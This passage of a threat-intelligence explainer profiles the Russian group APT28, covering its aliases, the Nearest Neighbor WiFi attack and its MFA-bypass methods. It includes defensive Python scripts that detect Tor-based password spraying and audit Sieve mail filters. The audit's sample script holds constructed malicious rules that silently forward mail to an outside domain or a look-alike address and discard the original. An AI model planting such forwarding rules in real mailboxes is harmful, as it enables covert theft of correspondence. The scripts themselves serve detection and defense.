  • Volexity (November 2024, Nearest Neighbor Attack report): Volexity described the Nearest Neighbor technique as delivering "all the benefits of being in close physical proximity" while the operator remained thousands of miles away — effectively a remote close-access operation that eliminates the physical risk of being identified or detained.
  • UK Minister for Europe statement on the OPCW operation (October 4, 2018): The UK government confirmed plainly that "GRU officers do not just attempt to compromise our computer systems from their barracks" — establishing on the public record that Unit 26165 deploys technical officers to foreign countries to conduct on-site operations when remote methods fail.

Frequently Asked Questions

What does APT28 stand for?

APT stands for Advanced Persistent Threat — a designation used by the cybersecurity firm Mandiant (then FireEye) to classify state-sponsored or state-directed threat actors who conduct sustained, targeted intrusion campaigns. The number 28 is simply a sequential identifier in Mandiant's classification system. FireEye designated the group APT28 in its October 2014 report "APT28: A Window Into Russia's Cyber Espionage Operations." Different vendors use different names for the same group — CrowdStrike calls it Fancy Bear, Microsoft calls it Forest Blizzard (formerly STRONTIUM), ESET calls it Sednit, and so on — but APT28 and G0007 (the MITRE ATT&CK identifier) are the most widely used cross-vendor references.

Is APT28 the same as Fancy Bear?

Yes. Fancy Bear is CrowdStrike's code name for the same group. CrowdStrike uses an animal-based naming system for Russian threat actors — "Bear" denotes Russian origin. The "Fancy" portion was derived from the "Sofacy" malware family the group was using at the time of initial tracking. Both APT28 and Fancy Bear are used interchangeably across the security industry. Other names for the same group include Sofacy, Sednit, Pawn Storm, Forest Blizzard, STRONTIUM, and IRON TWILIGHT among others. All refer to GRU Unit 26165.

Who actually operates APT28 — what is GRU Unit 26165?

Unit 26165 is the 85th Main Special Service Center (85th GTsSS) of Russia's GRU (Main Intelligence Directorate of the General Staff of the Armed Forces). The GRU is Russia's military foreign intelligence service — separate from the civilian SVR and the domestic FSB. Unit 26165 was originally established May 23, 1953 as a cryptography and SIGINT center. It is headquartered at 20 Komsomolsky Prospekt in Moscow. The unit conducts both remote cyber operations and physical close-access operations using technical officers deployed abroad. The July 2018 Mueller indictment named 12 specific officers from this unit, including the unit's then-commander Viktor Netyksho and malware development chief Sergey Morgachev.

How is APT28 different from Sandworm?

Both are GRU units but with different missions and unit numbers. APT28 is Unit 26165, focused on espionage, intelligence collection, and political interference operations. Sandworm (also called APT44 or Seashell Blizzard) is Unit 74455, the GRU's Main Center for Special Technologies, focused on destructive operations — it was responsible for NotPetya, the Ukrainian power grid attacks, and Olympic Destroyer. The two units have coordinated on specific operations (confirmed by DOJ indictments), but they are not the same group and should not be treated as interchangeable. A source that uses APT28 and Sandworm as synonyms is using imprecise attribution.

Has anyone actually been arrested or convicted for APT28 operations?

No convictions. All named individuals remain in Russia and no extradition is possible. The DOJ indictments are symbolic and strategic — they name specific officers with specific charges, creating a permanent public record, limiting those individuals' international travel, and establishing legal precedent. Germany issued arrest warrants for Dmitry Badin (Bundestag hack) and Nikolay Kozachek (NATO facility compromise) but neither has been apprehended. Four GRU officers were physically detained in the Netherlands in April 2018 during the OPCW close-access operation, but they held diplomatic passports and were expelled rather than prosecuted. The international community's response has been coordinated public attribution, sanctions, and intelligence sharing — not criminal prosecution.

What is the "Nearest Neighbor Attack"?

A technique documented by Volexity in November 2024 (describing a February 2022 incident). APT28 had obtained the WiFi credentials of a Washington D.C. target through password spraying, but MFA prevented use of those credentials over the public internet. Rather than give up, APT28 compromised organizations in adjacent buildings within WiFi range of the target, then used dual-homed systems (machines connected to both wired and wireless networks) to daisy-chain through neighboring organizations until reaching a device that could connect to the target's WiFi access points. From there, they connected via RDP and moved laterally inside the target network — all while operating remotely from Russia. The technique achieves the access benefits of a physical close-access operation without the physical risk of being identified or detained.

Can APT28 bypass multi-factor authentication?

Yes, through multiple documented techniques. SpyPress.MDAEMON (Operation RoundPress) extracts the underlying TOTP secret and creates an application password, maintaining mailbox access even after password and 2FA code changes. FrostArmada bypassed MFA entirely by operating at the DNS layer, intercepting authentication traffic before it reaches the MFA checkpoint. The Nearest Neighbor attack bypassed MFA on a WiFi network because the WiFi authentication system did not require MFA (only the internet-facing services did). Password spraying through Tor combined with token theft is another documented approach. FIDO2/WebAuthn credentials (hardware tokens, passkeys) resist all of these better than TOTP because the private key never leaves the authenticator and each assertion is bound to the relying party's origin: there is no seed to steal, and a login relayed through an attacker-controlled domain fails verification.
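The "password spraying through Tor" technique mentioned here and in the credential protection bullet under Mitigation & Defense has a simple detection shape, shown as an added example below (not taken from any advisory). The exit list and the log lines are constructed with RFC 5737 documentation addresses; the key=value log format is an assumption. The spray heuristic is the classic one: a single source touching many distinct accounts with at most a couple of attempts each, which is how an attacker stays under lockout thresholds.

```python
from collections import defaultdict

# Constructed stand-in for a Tor exit-node list. Operationally: pull the published exit list
# and refresh it at least hourly, because exit IPs churn.
TOR_EXITS = {"198.51.100.7", "203.0.113.44"}

# Constructed auth log in an assumed key=value shape. Real sources would be IdP sign-in logs,
# ADFS/Entra events, or sshd/VPN logs normalized to the same fields.
SAMPLE_LOG = """\
2025-07-10T08:00:01Z src=192.0.2.10 user=alice result=FAIL
2025-07-10T08:00:05Z src=192.0.2.10 user=alice result=OK
2025-07-10T08:01:00Z src=198.51.100.7 user=alice result=FAIL
2025-07-10T08:01:02Z src=198.51.100.7 user=bob result=FAIL
2025-07-10T08:01:04Z src=198.51.100.7 user=carol result=FAIL
2025-07-10T08:01:06Z src=198.51.100.7 user=dave result=FAIL
2025-07-10T08:01:08Z src=198.51.100.7 user=erin result=OK
2025-07-10T08:02:00Z src=203.0.113.44 user=frank result=OK
"""


def parse_line(line):
    # "<timestamp> k=v k=v ..." -> dict with the timestamp under "ts".
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = ts
    return rec


def analyse(log, tor_exits=TOR_EXITS, min_users=4, max_per_user=2):
    """Return alerts: every authentication from a Tor exit, plus the password-spray signature
    (one source, many distinct accounts, few attempts per account so lockout never triggers)."""
    by_src = defaultdict(list)
    for line in log.splitlines():
        if line.strip():
            rec = parse_line(line)
            by_src[rec["src"]].append(rec)
    alerts = []
    for src, recs in by_src.items():
        per_user = defaultdict(int)
        for r in recs:
            per_user[r["user"]] += 1
        succeeded = sorted({r["user"] for r in recs if r["result"] == "OK"})
        via_tor = src in tor_exits
        if via_tor:
            alerts.append({"type": "tor-exit-auth", "src": src, "attempts": len(recs),
                           "succeeded": succeeded, "severity": "high" if succeeded else "medium"})
        if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
            alerts.append({"type": "password-spray", "src": src, "distinct_users": len(per_user),
                           "succeeded": succeeded, "via_tor": via_tor,
                           "severity": "critical" if (succeeded and via_tor) else "high"})
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

Per-source grouping is deliberately naive: a spray distributed across many exits or VPN egress points (the 2021 GRU campaign rotated through a Kubernetes cluster and Tor) never exceeds the per-source threshold. For that variant, group by target tenant and time window instead, and treat a successful login from a Tor exit as an incident in its own right, since there is no legitimate reason for corporate authentication to arrive that way.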

What is APT28's connection to the 2016 U.S. election?

APT28 compromised the Democratic National Committee (DNC), the Democratic Congressional Campaign Committee (DCCC), and the personal email account of John Podesta (Hillary Clinton's campaign chairman) through spear-phishing in early 2016. Tens of thousands of emails were exfiltrated. The material was released through GRU-operated personas — DCLeaks (a fictitious hacktivist site) and Guccifer 2.0 (a fabricated Romanian hacker) — as well as through WikiLeaks. The Mueller investigation indicted 12 GRU Unit 26165 officers for these operations in July 2018. A separate APT29 (SVR) intrusion into the DNC was also active simultaneously, independently — the two groups were apparently unaware of each other.

What should organizations in APT28's target profile do right now?

The May 2025 21-agency CISA advisory (AA25-141A) issued a specific call to action for logistics and technology companies supporting Ukraine: assume you are a target. More broadly: (1) treat your enterprise WiFi network with the same security controls as internet-facing services — MFA must apply to WiFi access, not just web portals; (2) patch Microsoft Outlook and Exchange on an emergency timeline given CVE-2023-23397 and related zero-days; (3) audit all webmail platforms outside Microsoft/Google for XSS vulnerabilities and unauthorized Sieve rules; (4) review application password lists in Microsoft 365 and MDaemon for unauthorized entries; (5) ensure SOHO routers used by remote workers are running current firmware with default credentials replaced; and (6) treat any single detected APT28 IOC as grounds for a full incident response investigation rather than point-in-time remediation.
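Item (3) above and the webmail hardening bullet in Mitigation & Defense both call for auditing Sieve rules for unauthorized forwarding, which is the persistence the SpyPress webmail payloads planted. The following is an added example, not ESET's or any vendor's code, of what that audit looks like in practice: it ignores comments, flags every redirect to a domain outside the organisation's own (a constructed set), and records the three attributes that separate an exfiltration rule from a legitimate forward: a :copy that leaves the original in place so the victim notices nothing, a discard that hides the matched mail, and an unconditional match. The sample script is constructed and includes a look-alike domain because that is how these rules are usually disguised.

```python
import re

ORG_DOMAINS = {"example.gov"}  # assumption: the organisation's own mail domains

# Quoted strings are matched first so a '#' inside a string is not mistaken for a comment.
_STRING_OR_COMMENT = re.compile(r'"(?:[^"\\]|\\.)*"|/\*.*?\*/|#[^\n]*', re.S)
_REDIRECT = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s+"([^"]+)"', re.I)

# Constructed sample: two legitimate rules, one silent external copy, one typosquat plus discard.
SAMPLE_SCRIPT = """\
require ["fileinto", "copy"];
# Legitimate: file vendor newsletters
if header :contains "from" "newsletter@vendor.example" {
    fileinto "Newsletters";
}
/* forward ops traffic to an internal team mailbox */
if header :contains "subject" "[ops]" {
    redirect "ops-team@example.gov";
}
if true {
    redirect :copy "backup-archive@webmail-sync.example.net";
}
if header :contains "subject" "password" {
    redirect "helpdesk@exarnple.gov";
    discard;
}
"""


def blank_comments(script):
    # Replace comments with same-length whitespace (newlines kept) so offsets and line
    # numbers still refer to the original script.
    def repl(m):
        tok = m.group()
        return tok if tok.startswith('"') else re.sub(r"[^\n]", " ", tok)
    return _STRING_OR_COMMENT.sub(repl, script)


def enclosing_block(text, pos):
    # Innermost { ... } around pos; (None, text) when the action is at top level.
    depth = 0
    for i in range(pos - 1, -1, -1):
        if text[i] == "}":
            depth += 1
        elif text[i] == "{":
            if depth == 0:
                break
            depth -= 1
    else:
        return None, text
    depth = 0
    for j in range(i, len(text)):
        depth += text[j] == "{"
        depth -= text[j] == "}"
        if depth == 0:
            return i, text[i:j + 1]
    return i, text[i:]


def audit_sieve(script, org_domains=ORG_DOMAINS):
    """Return one finding per redirect whose target domain is not an organisation domain."""
    text = blank_comments(script)
    findings = []
    for m in _REDIRECT.finditer(text):
        target = m.group(2)
        domain = target.rsplit("@", 1)[-1].lower()
        if domain in org_domains:
            continue  # internal forwarding is out of scope for this check
        start, block = enclosing_block(text, m.start())
        if start is None:
            unconditional = True  # a top-level action runs for every message
        else:
            head = re.split(r"[;}]", text[:start])[-1].strip()
            unconditional = re.fullmatch(r"if\s+true", head) is not None
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "target": target,
            "silent_copy": ":copy" in m.group(1).lower().split(),
            "discards_original": re.search(r"\bdiscard\b", block) is not None,
            "unconditional": unconditional,
        })
    return findings


if __name__ == "__main__":
    for f in audit_sieve(SAMPLE_SCRIPT):
        print(f)
```

Run this against every user's active script exported from the Sieve store (ManageSieve, or the filter table of Roundcube's managesieve plugin) on a schedule, and diff against the previous run: a rule that appeared without a helpdesk ticket is the finding, whatever its target. Domains that differ from yours by one glyph, as in the constructed helpdesk rule, deserve a specific check because they pass a casual visual review.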

Sources & Further Reading